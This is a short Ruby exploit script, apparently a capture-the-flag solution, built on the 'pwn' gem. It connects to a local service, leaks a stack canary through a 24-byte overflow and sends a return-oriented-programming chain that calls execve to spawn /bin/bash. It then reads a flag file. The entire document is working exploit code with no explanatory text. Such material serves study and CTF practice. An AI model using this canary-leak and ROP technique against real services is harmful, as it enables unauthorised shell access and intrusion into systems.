require 'pwn'
pop_rdi=0x4005d5
z=Sock.new '127.0.0.1',31338
x='a'*24
z.write x+'|'
c=u64("\x00"+z.recvline.split('|')[1][0,7])
p=[c,0,pop_rdi,0,0x443799,16,0x6CC080,0x440300,pop_rdi,0x6CC080,0x44379a,0,0x47a6e6,59,0,0,0x43FB06].map { |x| p64 x}.join
z.write (x+p).ljust(217,"\x00")
z.write "exit\n"
sleep 0.3
z.write "/bin/bash\x00"
sleep 0.3
z.write "cat /home/start/flag\n"
puts z.recv(2048)
puts z.recv(2048)